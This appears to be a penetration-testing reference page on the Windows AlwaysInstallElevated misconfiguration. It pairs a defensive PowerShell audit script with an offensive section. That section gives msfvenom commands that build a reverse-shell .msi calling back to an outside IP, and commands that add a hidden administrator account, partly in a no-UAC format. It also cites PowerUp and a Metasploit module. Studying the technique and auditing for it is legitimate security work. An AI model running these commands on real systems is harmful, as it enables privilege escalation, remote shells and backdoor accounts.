AlwaysInstallElevated
Windows systems are affected by a privilege escalation vulnerability when the registry keys HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated are both set to 1. This misconfiguration allows any local user to execute Windows Installer (.msi) packages with elevated privileges. Exploitation is achieved by generating a malicious .msi payload and executing it through msiexec, which results in code execution as SYSTEM.
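To audit a host for this condition before anyone else does, the following PowerShell script (an added example, not code from the original page) reads both registry values named above and reports whether the privilege escalation condition is present. It treats a missing key or value as "not configured", which Windows Installer also treats as disabled; the hive paths are taken from the text above and nothing else is assumed.

```powershell
# Added example: audit the two AlwaysInstallElevated policy values and
# report whether the misconfiguration described on this page is present.
$paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    param([string[]]$RegistryPaths)
    $results = @{}
    foreach ($p in $RegistryPaths) {
        $value = $null
        if (Test-Path $p) {
            # -ErrorAction SilentlyContinue: the key may exist without the value
            $item = Get-ItemProperty -Path $p -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
            if ($null -ne $item) { $value = [int]$item.AlwaysInstallElevated }
        }
        $results[$p] = $value   # $null means "not configured" (disabled)
    }
    return $results
}

$state = Get-AlwaysInstallElevatedState -RegistryPaths $paths
foreach ($entry in $state.GetEnumerator()) {
    $shown = if ($null -eq $entry.Value) { 'not set' } else { $entry.Value }
    Write-Output ("{0}\AlwaysInstallElevated = {1}" -f $entry.Key, $shown)
}

# msiexec only installs as SYSTEM when BOTH values are 1; a single 0 or
# missing value on either side is enough to disable the behaviour.
$enabledCount = @($state.Values | Where-Object { $_ -eq 1 }).Count
if ($enabledCount -eq $paths.Count) {
    Write-Warning 'AlwaysInstallElevated is enabled in HKLM and HKCU: any local user can install .msi packages as SYSTEM.'
    # Remediation (HKLM requires an administrative shell):
    #   Set-ItemProperty -Path $paths[0] -Name AlwaysInstallElevated -Value 0
    #   Set-ItemProperty -Path $paths[1] -Name AlwaysInstallElevated -Value 0
} else {
    Write-Output 'AlwaysInstallElevated is not enabled in both hives; msiexec will not elevate.'
}
```

Note that HKCU reflects only the user running the script; the HKCU value of another account can differ, so a fleet audit should also inspect the policy source (GPO) that sets it.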
There are various ways to exploit this misconfiguration:

Generate a reverse shell payload packaged as an .msi:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f msi -o revshell.msi

Create an admin user:
# Create an admin user (no-UAC format)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi
# Create an admin user (when run through msiexec, no UAC prompt appears)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi

# PowerUp
Write-UserAddMSI

If you have a Meterpreter session you can automate this technique using the module:
> use exploit/windows/local/always_install_elevated